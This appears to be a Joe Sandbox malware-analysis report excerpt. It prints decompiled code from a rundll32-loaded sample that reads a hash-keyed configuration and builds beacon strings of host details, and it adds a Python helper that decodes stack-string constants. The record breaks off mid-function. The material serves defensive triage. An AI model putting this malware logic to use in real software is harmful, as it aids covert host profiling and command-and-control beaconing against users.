                                                  • Snapshot File: hcaresult_17_2_4f40000_rundll32.jbxd
                                                  Similarity
                                                  • API ID: FileHeap$AllocateFindmemset$AddressChangeCloseCreateFirstFreeNotificationProcTimelstrcatlstrlenmbstowcs
                                                  • String ID:
                                                  • API String ID: 983081259-0
                                                  • Opcode ID: 64ac5f233fc09e8e6178690117fe462bd56bebba47d3a88227eede4ec57b2bc3
                                                  • Instruction ID: 7634ace704a28c63c29738241ff956716159ee43b14a1d897065ad95c151542e
                                                  • Opcode Fuzzy Hash: 64ac5f233fc09e8e6178690117fe462bd56bebba47d3a88227eede4ec57b2bc3
                                                  • Instruction Fuzzy Hash: 5C01B53A700204AAF7006EEADC80B7A7E99EBD53E4F5204B5B945D6050DE69BE839620
Uniqueness
• Uniqueness Score: -1.00%
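The DWORDs the decompiler annotates on string operands in E04F473FD (0x30314549, 0x52384549, 0x4f0053, 0x680043) and the values sitting on the stack at the GetProcAddress and lstrcat calls under E04F421CD (0x36776F57, 0x642E2A5C) are the first four bytes of strings the report never shows in full. Recovering their text is a routine triage step, so here is an added example written for this page; it is not part of the Joe Sandbox report or of the sample. It assumes the constants are string fragments pushed as immediates (four ASCII or two UTF-16LE characters per DWORD); values that do not decode cleanly, such as the seed 0x63699bc3 or the pointer 0x212a5a8, are dropped rather than guessed at.

```python
import re
import string

# Immediates copied from this listing (constructed input for the example).
LISTING_IMMEDIATES = {
    0x30314549: "E04F473FD, E04F489D6 argument, length 0x14",
    0x52384549: "E04F473FD, E04F489D6 argument, length 0x13",
    0x004F0053: "E04F473FD, E04F41262 / E04F47CB8 argument",
    0x00680043: "E04F473FD, E04F42659 argument",
    0x36776F57: "E04F421CD, stack at GetProcAddress",
    0x642E2A5C: "E04F421CD, lstrcat argument",
    0x63699BC3: "E04F44094, seed at 0x4f4d278",
    0x0212A5A8: "E04F473FD, string-table base pointer",
}

# Printable characters, with the control whitespace removed.
PRINTABLE = set(string.printable) - set("\t\n\r\x0b\x0c")


def decode_immediate(value: int, width: int = 4):
    """Return ('ascii', text), ('utf16', text) or None for a little-endian immediate.

    A 'push imm32' stack string stores 4 ASCII or 2 UTF-16LE characters per
    DWORD, so the byte order on the stack is little-endian.
    """
    raw = value.to_bytes(width, "little")
    text = raw.decode("ascii", errors="replace")
    if all(ch in PRINTABLE for ch in text):
        return ("ascii", text)
    # UTF-16LE: every odd byte is zero and every even byte is printable.
    if width % 2 == 0 and all(raw[i] == 0 for i in range(1, width, 2)):
        wide = raw.decode("utf-16-le")
        if all(ch in PRINTABLE for ch in wide):
            return ("utf16", wide)
    return None


def recover_strings(immediates):
    """Map each immediate that decodes cleanly to its (kind, text)."""
    out = {}
    for value in immediates:
        decoded = decode_immediate(value)
        if decoded is not None:
            out[value] = decoded
    return out


# Any 8-hex-digit token, with or without a 0x prefix, not embedded in a longer hex run.
HEX_DWORD = re.compile(r"(?<![0-9A-Fa-f])(?:0x)?([0-9A-Fa-f]{8})(?![0-9A-Fa-f])")


def scan_listing(text: str):
    """Pull every 8-hex-digit token out of a report excerpt and decode it."""
    values = {int(m.group(1), 16) for m in HEX_DWORD.finditer(text)}
    return recover_strings(values)


if __name__ == "__main__":
    for value, (kind, text) in sorted(recover_strings(LISTING_IMMEDIATES).items()):
        print(f"0x{value:08x}  {kind:5}  {text!r:10}  {LISTING_IMMEDIATES[value]}")
```

Run on the listing's own immediates this yields "IE10", "IE8R", L"SO", L"Ch", "Wow6" and "\*.d"; the seed and the pointer are rejected. Only the first DWORD of each string is on the page, so the full names still have to come from the dump.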

                                                  Non-executed Functions

                                                  C-Code - Quality: 92%
			/* Reading of E04F44094 (comments added for this listing, not decompiler
			   output): configuration lookup by hashed key. *0x4f4d278 holds a per-sample
			   seed (0x63699bc3 in this dump) and every key constant in the image is stored
			   pre-XORed with it, so the value handed to the lookup is seed ^ constant and
			   the raw key hash never appears in the binary. E04F48748 fetches a blob by
			   hash into (_v12, size _v8); E04F43F7C pulls a named value out of a blob by
			   hash; StrToIntExA parses each value as an integer into a global. The listing
			   is cut off after the seed ^ 0x2cc1f2fd lookup. */
			E04F44094(int* __ecx) {
                                                  				int _v8;
                                                  				void* _v12;
                                                  				void* __esi;
                                                  				signed int _t20;
                                                  				signed int _t25;
                                                  				char* _t31;
                                                  				char* _t32;
                                                  				char* _t33;
                                                  				char* _t34;
                                                  				char* _t35;
                                                  				void* _t36;
                                                  				void* _t37;
                                                  				void* _t38;
                                                  				intOrPtr _t39;
                                                  				void* _t41;
                                                  				intOrPtr _t42;
                                                  				intOrPtr _t43;
                                                  				signed int _t46;
                                                  				intOrPtr _t49;
                                                  				signed int _t50;
                                                  				signed int _t55;
                                                  				void* _t57;
                                                  				void* _t58;
                                                  				signed int _t60;
                                                  				signed int _t64;
                                                  				signed int _t68;
                                                  				signed int _t72;
                                                  				signed int _t76;
                                                  				signed int _t80;
                                                  				void* _t85;
                                                  				intOrPtr _t102;
                                                  
				_t86 = __ecx;
				_t20 =  *0x4f4d278; // 0x63699bc3: the seed
				// first blob: kept at 0x4f4d2d4 only if it is at least 0x90 bytes long
				if(E04F48748( &_v12,  &_v8, _t20 ^ 0x8241c5a7) != 0 && _v8 >= 0x90) {
					 *0x4f4d2d4 = _v12;
				}
				_t25 =  *0x4f4d278; // 0x63699bc3
				// second blob: the parameter block every lookup below reads from
				if(E04F48748( &_v12,  &_v8, _t25 ^ 0xecd84622) == 0) {
					_push(2); // push 2 / pop: compact encoding of result = 2 (ERROR_FILE_NOT_FOUND in this listing's error-code convention)
					_pop(0);
					goto L60; // common exit, off-page
                                                  				} else {
					_t85 = _v12; // parameter block
					if(_t85 == 0) {
						_t31 = 0;
					} else {
						_t80 =  *0x4f4d278; // 0x63699bc3
						_t31 = E04F43F7C(_t86, _t85, _t80 ^ 0x724e87bc); // value lookup by hash in the parameter block
					}
					if(_t31 != 0) {
						_t86 =  &_v8;
						if(StrToIntExA(_t31, 0,  &_v8) != 0) { // flags 0 (STIF_DEFAULT): decimal text to int
							 *0x4f4d240 = _v8; // the same lookup/parse pattern repeats below for 0x4f4d244, 0x4f4d248, 0x4f4d004 and 0x4f4d02c
						}
					}
                                                  					if(_t85 == 0) {
                                                  						_t32 = 0;
                                                  					} else {
                                                  						_t76 =  *0x4f4d278; // 0x63699bc3
                                                  						_t32 = E04F43F7C(_t86, _t85, _t76 ^ 0x2b40cc40);
                                                  					}
                                                  					if(_t32 != 0) {
                                                  						_t86 =  &_v8;
                                                  						if(StrToIntExA(_t32, 0,  &_v8) != 0) {
                                                  							 *0x4f4d244 = _v8;
                                                  						}
                                                  					}
                                                  					if(_t85 == 0) {
                                                  						_t33 = 0;
                                                  					} else {
                                                  						_t72 =  *0x4f4d278; // 0x63699bc3
                                                  						_t33 = E04F43F7C(_t86, _t85, _t72 ^ 0x3b27c2e6);
                                                  					}
                                                  					if(_t33 != 0) {
                                                  						_t86 =  &_v8;
                                                  						if(StrToIntExA(_t33, 0,  &_v8) != 0) {
                                                  							 *0x4f4d248 = _v8;
                                                  						}
                                                  					}
                                                  					if(_t85 == 0) {
                                                  						_t34 = 0;
                                                  					} else {
                                                  						_t68 =  *0x4f4d278; // 0x63699bc3
                                                  						_t34 = E04F43F7C(_t86, _t85, _t68 ^ 0x0602e249);
                                                  					}
                                                  					if(_t34 != 0) {
                                                  						_t86 =  &_v8;
                                                  						if(StrToIntExA(_t34, 0,  &_v8) != 0) {
                                                  							 *0x4f4d004 = _v8;
                                                  						}
                                                  					}
                                                  					if(_t85 == 0) {
                                                  						_t35 = 0;
                                                  					} else {
                                                  						_t64 =  *0x4f4d278; // 0x63699bc3
                                                  						_t35 = E04F43F7C(_t86, _t85, _t64 ^ 0x3603764c);
                                                  					}
                                                  					if(_t35 != 0) {
                                                  						_t86 =  &_v8;
                                                  						if(StrToIntExA(_t35, 0,  &_v8) != 0) {
                                                  							 *0x4f4d02c = _v8;
                                                  						}
                                                  					}
                                                  					if(_t85 == 0) {
                                                  						_t36 = 0;
                                                  					} else {
                                                  						_t60 =  *0x4f4d278; // 0x63699bc3
                                                  						_t36 = E04F43F7C(_t86, _t85, _t60 ^ 0x2cc1f2fd);
                                                  					}
                                                  					if(_t36 != 0) {
                                                  						_push(_t36);
                                                  						_t57 = 0x10;
                                                  						_t58 = E04F46ED2(_t57);
                                                  						if(_t58 != 0) {
                                                  							_push(_t58);
                                                  							E04F4A5D6();
                                                  						}
                                                  					}
                                                  					if(_t85 == 0) {
                                                  						_t37 = 0;
                                                  					} else {
                                                  						_t55 =  *0x4f4d278; // 0x63699bc3
                                                  						_t37 = E04F43F7C(_t86, _t85, _t55 ^ 0xb30fc035);
                                                  					}
                                                  					if(_t37 != 0 && E04F46ED2(0, _t37) != 0) {
                                                  						_t102 =  *0x4f4d32c; // 0x70795b0
                                                  						E04F475E9(_t102 + 4, _t53);
                                                  					}
                                                  					if(_t85 == 0) {
                                                  						_t38 = 0;
                                                  					} else {
                                                  						_t50 =  *0x4f4d278; // 0x63699bc3
                                                  						_t38 = E04F43F7C(_t86, _t85, _t50 ^ 0x372ab5b7);
                                                  					}
                                                  					if(_t38 == 0) {
                                                  						L51:
                                                  						_t39 =  *0x4f4d27c; // 0x212a5a8
                                                  						_t18 = _t39 + 0x4f4e252; // 0x616d692f
                                                  						 *0x4f4d2d0 = _t18;
                                                  						goto L52;
                                                  					} else {
                                                  						_t49 = E04F46ED2(0, _t38);
                                                  						 *0x4f4d2d0 = _t49;
                                                  						if(_t49 != 0) {
                                                  							L52:
                                                  							if(_t85 == 0) {
                                                  								_t41 = 0;
                                                  							} else {
                                                  								_t46 =  *0x4f4d278; // 0x63699bc3
                                                  								_t41 = E04F43F7C(_t86, _t85, _t46 ^ 0xd8dc5cde);
                                                  							}
                                                  							if(_t41 == 0) {
                                                  								_t42 =  *0x4f4d27c; // 0x212a5a8
                                                  								_t19 = _t42 + 0x4f4e791; // 0x6976612e
                                                  								_t43 = _t19;
                                                  							} else {
                                                  								_t43 = E04F46ED2(0, _t41);
                                                  							}
                                                  							 *0x4f4d340 = _t43;
                                                  							HeapFree( *0x4f4d238, 0, _t85);
                                                  							L60:
                                                  							return 0;
                                                  						}
                                                  						goto L51;
                                                  					}
                                                  				}
                                                  			}
                                                  0x04f44094
                                                  0x04f44097
                                                  0x04f440b7
                                                  0x04f440c5
                                                  0x04f440c5
                                                  0x04f440ca
                                                  0x04f440e4
                                                  0x04f442e2
                                                  0x04f442e4
                                                  0x00000000
                                                  0x04f440ea
                                                  0x04f440ea
                                                  0x04f440f1
                                                  0x04f44107
                                                  0x04f440f3
                                                  0x04f440f3
                                                  0x04f44100
                                                  0x04f44100
                                                  0x04f44111
                                                  0x04f44113
                                                  0x04f4411d
                                                  0x04f44122
                                                  0x04f44122
                                                  0x04f4411d
                                                  0x04f44129
                                                  0x04f4413f
                                                  0x04f4412b
                                                  0x04f4412b
                                                  0x04f44138
                                                  0x04f44138
                                                  0x04f44143
                                                  0x04f44145
                                                  0x04f4414f
                                                  0x04f44154
                                                  0x04f44154
                                                  0x04f4414f
                                                  0x04f4415b
                                                  0x04f44171
                                                  0x04f4415d
                                                  0x04f4415d
                                                  0x04f4416a
                                                  0x04f4416a
                                                  0x04f44175
                                                  0x04f44177
                                                  0x04f44181
                                                  0x04f44186
                                                  0x04f44186
                                                  0x04f44181
                                                  0x04f4418d
                                                  0x04f441a3
                                                  0x04f4418f
                                                  0x04f4418f
                                                  0x04f4419c
                                                  0x04f4419c
                                                  0x04f441a7
                                                  0x04f441a9
                                                  0x04f441b3
                                                  0x04f441b8
                                                  0x04f441b8
                                                  0x04f441b3
                                                  0x04f441bf
                                                  0x04f441d5
                                                  0x04f441c1
                                                  0x04f441c1
                                                  0x04f441ce
                                                  0x04f441ce
                                                  0x04f441d9
                                                  0x04f441db
                                                  0x04f441e5
                                                  0x04f441ea
                                                  0x04f441ea
                                                  0x04f441e5
                                                  0x04f441f1
                                                  0x04f44207
                                                  0x04f441f3
                                                  0x04f441f3
                                                  0x04f44200
                                                  0x04f44200
                                                  0x04f4420b
                                                  0x04f4420d
                                                  0x04f44210
                                                  0x04f44211
                                                  0x04f44218
                                                  0x04f4421a
                                                  0x04f4421b
                                                  0x04f4421b
                                                  0x04f44218
                                                  0x04f44222
                                                  0x04f44238
                                                  0x04f44224
                                                  0x04f44224
                                                  0x04f44231
                                                  0x04f44231
                                                  0x04f4423c
                                                  0x04f4424a
                                                  0x04f44254
                                                  0x04f44254
                                                  0x04f4425b
                                                  0x04f44271
                                                  0x04f4425d
                                                  0x04f4425d
                                                  0x04f4426a
                                                  0x04f4426a
                                                  0x04f44275
                                                  0x04f44288
                                                  0x04f44288
                                                  0x04f4428d
                                                  0x04f44293
                                                  0x00000000
                                                  0x04f44277
                                                  0x04f4427a
                                                  0x04f44281
                                                  0x04f44286
                                                  0x04f44298
                                                  0x04f4429a
                                                  0x04f442b0
                                                  0x04f4429c
                                                  0x04f4429c
                                                  0x04f442a9
                                                  0x04f442a9
                                                  0x04f442b4
                                                  0x04f442c0
                                                  0x04f442c5
                                                  0x04f442c5
                                                  0x04f442b6
                                                  0x04f442b9
                                                  0x04f442b9
                                                  0x04f442d3
                                                  0x04f442d8
                                                  0x04f442e5
                                                  0x04f442e9
                                                  0x04f442e9
                                                  0x00000000
                                                  0x04f44286
                                                  0x04f44275

                                                  APIs
                                                  • StrToIntExA.SHLWAPI(00000000,00000000,?,04F423DE,?,63699BC3,04F423DE,?,63699BC3,00000005,04F4D00C,00000008,?,04F423DE), ref: 04F44119
                                                  • StrToIntExA.SHLWAPI(00000000,00000000,?,04F423DE,?,63699BC3,04F423DE,?,63699BC3,00000005,04F4D00C,00000008,?,04F423DE), ref: 04F4414B
                                                  • StrToIntExA.SHLWAPI(00000000,00000000,?,04F423DE,?,63699BC3,04F423DE,?,63699BC3,00000005,04F4D00C,00000008,?,04F423DE), ref: 04F4417D
                                                  • StrToIntExA.SHLWAPI(00000000,00000000,?,04F423DE,?,63699BC3,04F423DE,?,63699BC3,00000005,04F4D00C,00000008,?,04F423DE), ref: 04F441AF
                                                  • StrToIntExA.SHLWAPI(00000000,00000000,?,04F423DE,?,63699BC3,04F423DE,?,63699BC3,00000005,04F4D00C,00000008,?,04F423DE), ref: 04F441E1
                                                  • HeapFree.KERNEL32(00000000,04F423DE,04F423DE,?,63699BC3,04F423DE,?,63699BC3,00000005,04F4D00C,00000008,?,04F423DE), ref: 04F442D8
                                                  Memory Dump Source
                                                  • Source File: 00000011.00000002.348222090.0000000004F41000.00000020.00020000.sdmp, Offset: 04F40000, based on PE: true
                                                  • Associated: 00000011.00000002.348194349.0000000004F40000.00000004.00020000.sdmp
                                                  • Associated: 00000011.00000002.348239029.0000000004F4C000.00000002.00020000.sdmp
                                                  • Associated: 00000011.00000002.348247296.0000000004F4D000.00000004.00020000.sdmp
                                                  • Associated: 00000011.00000002.348265999.0000000004F4F000.00000002.00020000.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_17_2_4f40000_rundll32.jbxd
                                                  Similarity
                                                  • API ID: FreeHeap
                                                  • String ID:
                                                  • API String ID: 3298025750-0
                                                  • Opcode ID: a6cead453c63d3129656d5149d37376890ebac156c247ae0bbce3a0e6dc1223a
                                                  • Instruction ID: f504315500ea7906fe04484d05a697e8b098770afd6bddbad1e3616ac2c6fdf6
                                                  • Opcode Fuzzy Hash: a6cead453c63d3129656d5149d37376890ebac156c247ae0bbce3a0e6dc1223a
                                                  • Instruction Fuzzy Hash: 6F6156B9B10118ABEB11EBB4EC84E5B7FE9EBD87507244915E501E7504FF38FA428724
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  C-Code - Quality: 66%
                                                  			E04F4A279(long __eax, void* __ecx, void* __edx, intOrPtr _a4, intOrPtr _a12, void* _a16, void* _a24, intOrPtr _a32) {
                                                  				intOrPtr _v0;
                                                  				intOrPtr _v4;
                                                  				intOrPtr _v16;
                                                  				intOrPtr _v24;
                                                  				intOrPtr _v28;
                                                  				void* _v44;
                                                  				intOrPtr _v52;
                                                  				void* __edi;
                                                  				long _t25;
                                                  				intOrPtr _t26;
                                                  				intOrPtr _t27;
                                                  				intOrPtr _t28;
                                                  				intOrPtr _t29;
                                                  				intOrPtr _t30;
                                                  				void* _t33;
                                                  				intOrPtr _t34;
                                                  				int _t37;
                                                  				intOrPtr _t42;
                                                  				intOrPtr _t43;
                                                  				intOrPtr _t50;
                                                  				intOrPtr _t54;
                                                  				intOrPtr* _t56;
                                                  				intOrPtr _t62;
                                                  				intOrPtr _t68;
                                                  				intOrPtr _t71;
                                                  				intOrPtr _t74;
                                                  				int _t77;
                                                  				intOrPtr _t78;
                                                  				int _t81;
                                                  				intOrPtr _t83;
                                                  				int _t86;
                                                  				intOrPtr* _t89;
                                                  				intOrPtr* _t90;
                                                  				void* _t91;
                                                  				void* _t95;
                                                  				void* _t96;
                                                  				void* _t97;
                                                  				intOrPtr _t98;
                                                  				void* _t100;
                                                  				int _t101;
                                                  				void* _t102;
                                                  				void* _t103;
                                                  				void* _t105;
                                                  				void* _t106;
                                                  				void* _t108;
                                                  
                                                  				_t95 = __edx;
                                                  				_t91 = __ecx;
                                                  				_t25 = __eax;
                                                  				_t105 = _a16;
                                                  				_v4 = 8;
                                                  				if(__eax == 0) {
                                                  					_t25 = GetTickCount();
                                                  				}
                                                  				_t26 =  *0x4f4d018; // 0xf56cfa1f
                                                  				asm("bswap eax");
                                                  				_t27 =  *0x4f4d014; // 0x3a87c8cd
                                                  				asm("bswap eax");
                                                  				_t28 =  *0x4f4d010; // 0xd8d2f808
                                                  				asm("bswap eax");
                                                  				_t29 =  *0x4f4d00c; // 0x8f8f86c2
                                                  				asm("bswap eax");
                                                  				_t30 =  *0x4f4d27c; // 0x212a5a8
                                                  				_t3 = _t30 + 0x4f4e633; // 0x74666f73
                                                  				_t101 = wsprintfA(_t105, _t3, 2, 0x3d14b, _t29, _t28, _t27, _t26,  *0x4f4d02c,  *0x4f4d004, _t25);
                                                  				_t33 = E04F41C1A();
                                                  				_t34 =  *0x4f4d27c; // 0x212a5a8
                                                  				_t4 = _t34 + 0x4f4e673; // 0x74707526
                                                  				_t37 = wsprintfA(_t101 + _t105, _t4, _t33);
                                                  				_t108 = _t106 + 0x38;
                                                  				_t102 = _t101 + _t37;
                                                  				_t96 = E04F454BC(_t91);
                                                  				if(_t96 != 0) {
                                                  					_t83 =  *0x4f4d27c; // 0x212a5a8
                                                  					_t6 = _t83 + 0x4f4e8eb; // 0x736e6426
                                                  					_t86 = wsprintfA(_t102 + _t105, _t6, _t96);
                                                  					_t108 = _t108 + 0xc;
                                                  					_t102 = _t102 + _t86;
                                                  					HeapFree( *0x4f4d238, 0, _t96);
                                                  				}
                                                  				_t97 = E04F47649();
                                                  				if(_t97 != 0) {
                                                  					_t78 =  *0x4f4d27c; // 0x212a5a8
                                                  					_t8 = _t78 + 0x4f4e8f3; // 0x6f687726
                                                  					_t81 = wsprintfA(_t102 + _t105, _t8, _t97);
                                                  					_t108 = _t108 + 0xc;
                                                  					_t102 = _t102 + _t81;
                                                  					HeapFree( *0x4f4d238, 0, _t97);
                                                  				}
                                                  				_t98 =  *0x4f4d32c; // 0x70795b0
                                                  				_a32 = E04F49395(0x4f4d00a, _t98 + 4);
                                                  				_t42 =  *0x4f4d2cc; // 0x0
                                                  				if(_t42 != 0) {
                                                  					_t74 =  *0x4f4d27c; // 0x212a5a8
                                                  					_t11 = _t74 + 0x4f4e8cd; // 0x3d736f26
                                                  					_t77 = wsprintfA(_t102 + _t105, _t11, _t42);
                                                  					_t108 = _t108 + 0xc;
                                                  					_t102 = _t102 + _t77;
                                                  				}
                                                  				_t43 =  *0x4f4d2c8; // 0x0
                                                  				if(_t43 != 0) {
                                                  					_t71 =  *0x4f4d27c; // 0x212a5a8
                                                  					_t13 = _t71 + 0x4f4e8c6; // 0x3d706926
                                                  					wsprintfA(_t102 + _t105, _t13, _t43);
                                                  				}
                                                  				if(_a32 != 0) {
                                                  					_t100 = RtlAllocateHeap( *0x4f4d238, 0, 0x800);
                                                  					if(_t100 != 0) {
                                                  						E04F47A80(GetTickCount());
                                                  						_t50 =  *0x4f4d32c; // 0x70795b0
                                                  						__imp__(_t50 + 0x40);
                                                  						asm("lock xadd [eax], ecx");
                                                  						_t54 =  *0x4f4d32c; // 0x70795b0
                                                  						__imp__(_t54 + 0x40);
                                                  						_t56 =  *0x4f4d32c; // 0x70795b0
                                                  						_t103 = E04F48307(1, _t95, _t105,  *_t56);
                                                  						asm("lock xadd [eax], ecx");
                                                  						if(_t103 != 0) {
                                                  							StrTrimA(_t103, 0x4f4c2ac);
                                                  							_push(_t103);
                                                  							_t62 = E04F43CC8();
                                                  							_v16 = _t62;
                                                  							if(_t62 != 0) {
                                                  								_t89 = __imp__;
                                                  								 *_t89(_t103, _v0);
                                                  								 *_t89(_t100, _a4);
                                                  								_t90 = __imp__;
                                                  								 *_t90(_t100, _v28);
                                                  								 *_t90(_t100, _t103);
                                                  								_t68 = E04F41199(0xffffffffffffffff, _t100, _v28, _v24);
                                                  								_v52 = _t68;
                                                  								if(_t68 != 0 && _t68 != 0x10d2) {
                                                  									E04F4A1B0();
                                                  								}
                                                  								HeapFree( *0x4f4d238, 0, _v44);
                                                  							}
                                                  							HeapFree( *0x4f4d238, 0, _t103);
                                                  						}
                                                  						HeapFree( *0x4f4d238, 0, _t100);
                                                  					}
                                                  					HeapFree( *0x4f4d238, 0, _a24);
                                                  				}
                                                  				HeapFree( *0x4f4d238, 0, _t105);
                                                  				return _a12;
                                                  			}
                                                  0x04f4a279
                                                  0x04f4a279
                                                  0x04f4a279
                                                  0x04f4a280
                                                  0x04f4a286
                                                  0x04f4a28e
                                                  0x04f4a290
                                                  0x04f4a290
                                                  0x04f4a29d
                                                  0x04f4a2a8
                                                  0x04f4a2ab
                                                  0x04f4a2b6
                                                  0x04f4a2b9
                                                  0x04f4a2be
                                                  0x04f4a2c1
                                                  0x04f4a2c6
                                                  0x04f4a2c9
                                                  0x04f4a2d5
                                                  0x04f4a2e2
                                                  0x04f4a2e4
                                                  0x04f4a2ea
                                                  0x04f4a2ef
                                                  0x04f4a2fa
                                                  0x04f4a2fc
                                                  0x04f4a2ff

                                                  APIs
                                                  • GetTickCount.KERNEL32 ref: 04F4A290
                                                  • wsprintfA.USER32 ref: 04F4A2DD
                                                  • wsprintfA.USER32 ref: 04F4A2FA
                                                  • wsprintfA.USER32 ref: 04F4A31D
                                                  • HeapFree.KERNEL32(00000000,00000000), ref: 04F4A32D
                                                  • wsprintfA.USER32 ref: 04F4A34F
                                                  • HeapFree.KERNEL32(00000000,00000000), ref: 04F4A35F
                                                  • wsprintfA.USER32 ref: 04F4A396
                                                  • wsprintfA.USER32 ref: 04F4A3B6
                                                  • RtlAllocateHeap.NTDLL(00000000,00000800), ref: 04F4A3D3
                                                  • GetTickCount.KERNEL32 ref: 04F4A3E3
                                                  • RtlEnterCriticalSection.NTDLL(07079570), ref: 04F4A3F7
                                                  • RtlLeaveCriticalSection.NTDLL(07079570), ref: 04F4A415
                                                    • Part of subcall function 04F48307: lstrlen.KERNEL32(00000000,253D7325,00000000,00000000,74ECC740,?,?,04F4A428,?,070795B0), ref: 04F48332
                                                    • Part of subcall function 04F48307: lstrlen.KERNEL32(?,?,?,04F4A428,?,070795B0), ref: 04F4833A
                                                    • Part of subcall function 04F48307: strcpy.NTDLL ref: 04F48351
                                                    • Part of subcall function 04F48307: lstrcat.KERNEL32(00000000,?), ref: 04F4835C
                                                    • Part of subcall function 04F48307: StrTrimA.SHLWAPI(00000000,=,00000000,00000000,?,?,?,04F4A428,?,070795B0), ref: 04F48379
                                                  • StrTrimA.SHLWAPI(00000000,04F4C2AC,?,070795B0), ref: 04F4A447
                                                    • Part of subcall function 04F43CC8: lstrlen.KERNEL32(070787FA,00000000,00000000,74ECC740,04F4A453,00000000), ref: 04F43CD8
                                                    • Part of subcall function 04F43CC8: lstrlen.KERNEL32(?), ref: 04F43CE0
                                                    • Part of subcall function 04F43CC8: lstrcpy.KERNEL32(00000000,070787FA), ref: 04F43CF4
                                                    • Part of subcall function 04F43CC8: lstrcat.KERNEL32(00000000,?), ref: 04F43CFF
                                                  • lstrcpy.KERNEL32(00000000,?), ref: 04F4A466
                                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 04F4A46D
                                                  • lstrcat.KERNEL32(00000000,?), ref: 04F4A47A
                                                  • lstrcat.KERNEL32(00000000,00000000), ref: 04F4A47E
                                                    • Part of subcall function 04F41199: WaitForSingleObject.KERNEL32(00000000,00000000,00000000,751881D0), ref: 04F4124B
                                                  • HeapFree.KERNEL32(00000000,?,00000000,?,?), ref: 04F4A4AE
                                                  • HeapFree.KERNEL32(00000000,00000000,00000000), ref: 04F4A4BD
                                                  • HeapFree.KERNEL32(00000000,00000000,?,070795B0), ref: 04F4A4CC
                                                  • HeapFree.KERNEL32(00000000,00000000), ref: 04F4A4DE
                                                  • HeapFree.KERNEL32(00000000,?), ref: 04F4A4ED
                                                  Memory Dump Source
                                                  • Source File: 00000011.00000002.348222090.0000000004F41000.00000020.00020000.sdmp, Offset: 04F40000, based on PE: true
                                                  • Associated: 00000011.00000002.348194349.0000000004F40000.00000004.00020000.sdmp
                                                  • Associated: 00000011.00000002.348239029.0000000004F4C000.00000002.00020000.sdmp
                                                  • Associated: 00000011.00000002.348247296.0000000004F4D000.00000004.00020000.sdmp
                                                  • Associated: 00000011.00000002.348265999.0000000004F4F000.00000002.00020000.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_17_2_4f40000_rundll32.jbxd
                                                  Similarity
                                                  • API ID: Heap$Free$wsprintf$lstrcatlstrlen$lstrcpy$CountCriticalSectionTickTrim$AllocateEnterLeaveObjectSingleWaitstrcpy
                                                  • String ID:
                                                  • API String ID: 3080378247-0
                                                  • Opcode ID: c5274f17db1b0b6b40ca90f805d31651c98133f686a95a4d54de101c3b2533b6
                                                  • Instruction ID: 9d0441d289211f3edd0bf60ea3efc907944024605bf13f3257e64d30072f7e31
                                                  • Opcode Fuzzy Hash: c5274f17db1b0b6b40ca90f805d31651c98133f686a95a4d54de101c3b2533b6
                                                  • Instruction Fuzzy Hash: 9561AB79901208AFE7219B68FC48F6A7BE8EBD8714F064114F908D7260DF3DED069B65
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  C-Code - Quality: 74%
                                                  			E04F48B94(long __eax, void* __ecx, void* __edx, intOrPtr _a4, char** _a8, int* _a12, void* _a16) {
                                                  				void* _v8;
                                                  				signed int _v12;
                                                  				void* _v16;
                                                  				void* _v20;
                                                  				void* _v24;
                                                  				void* _v28;
                                                  				void* __ebx;
                                                  				void* __edi;
                                                  				long _t59;
                                                  				intOrPtr _t60;
                                                  				intOrPtr _t61;
                                                  				intOrPtr _t62;
                                                  				intOrPtr _t63;
                                                  				intOrPtr _t64;
                                                  				void* _t67;
                                                  				intOrPtr _t68;
                                                  				int _t71;
                                                  				void* _t72;
                                                  				void* _t73;
                                                  				void* _t75;
                                                  				void* _t78;
                                                  				intOrPtr _t82;
                                                  				intOrPtr _t86;
                                                  				intOrPtr* _t88;
                                                  				void* _t94;
                                                  				intOrPtr _t101;
                                                  				signed int _t105;
                                                  				char** _t107;
                                                  				int _t110;
                                                  				intOrPtr* _t113;
                                                  				intOrPtr* _t115;
                                                  				intOrPtr* _t117;
                                                  				intOrPtr* _t119;
                                                  				intOrPtr _t122;
                                                  				intOrPtr _t127;
                                                  				int _t131;
                                                  				CHAR* _t133;
                                                  				intOrPtr _t134;
                                                  				void* _t135;
                                                  				void* _t144;
                                                  				int _t145;
                                                  				void* _t146;
                                                  				intOrPtr _t147;
                                                  				void* _t149;
                                                  				long _t153;
                                                  				intOrPtr* _t154;
                                                  				intOrPtr* _t155;
                                                  				intOrPtr* _t158;
                                                  				void* _t159;
                                                  				void* _t161;
                                                  
                                                  				_t144 = __edx;
                                                  				_t135 = __ecx;
                                                  				_t59 = __eax;
                                                  				_v12 = 8;
                                                  				if(__eax == 0) {
                                                  					_t59 = GetTickCount();
                                                  				}
                                                  				_t60 =  *0x4f4d018; // 0xf56cfa1f
                                                  				asm("bswap eax");
                                                  				_t61 =  *0x4f4d014; // 0x3a87c8cd
                                                  				_t133 = _a16;
                                                  				asm("bswap eax");
                                                  				_t62 =  *0x4f4d010; // 0xd8d2f808
                                                  				asm("bswap eax");
                                                  				_t63 =  *0x4f4d00c; // 0x8f8f86c2
                                                  				asm("bswap eax");
                                                  				_t64 =  *0x4f4d27c; // 0x212a5a8
                                                  				_t3 = _t64 + 0x4f4e633; // 0x74666f73
                                                  				_t145 = wsprintfA(_t133, _t3, 3, 0x3d14b, _t63, _t62, _t61, _t60,  *0x4f4d02c,  *0x4f4d004, _t59);
                                                  				_t67 = E04F41C1A();
                                                  				_t68 =  *0x4f4d27c; // 0x212a5a8
                                                  				_t4 = _t68 + 0x4f4e673; // 0x74707526
                                                  				_t71 = wsprintfA(_t145 + _t133, _t4, _t67);
                                                  				_t161 = _t159 + 0x38;
                                                  				_t146 = _t145 + _t71;
                                                  				_t72 = E04F454BC(_t135);
                                                  				_t134 = __imp__;
                                                  				_v8 = _t72;
                                                  				if(_t72 != 0) {
                                                  					_t127 =  *0x4f4d27c; // 0x212a5a8
                                                  					_t7 = _t127 + 0x4f4e8eb; // 0x736e6426
                                                  					_t131 = wsprintfA(_a16 + _t146, _t7, _t72);
                                                  					_t161 = _t161 + 0xc;
                                                  					_t146 = _t146 + _t131;
                                                  					HeapFree( *0x4f4d238, 0, _v8);
                                                  				}
                                                  				_t73 = E04F47649();
                                                  				_v8 = _t73;
                                                  				if(_t73 != 0) {
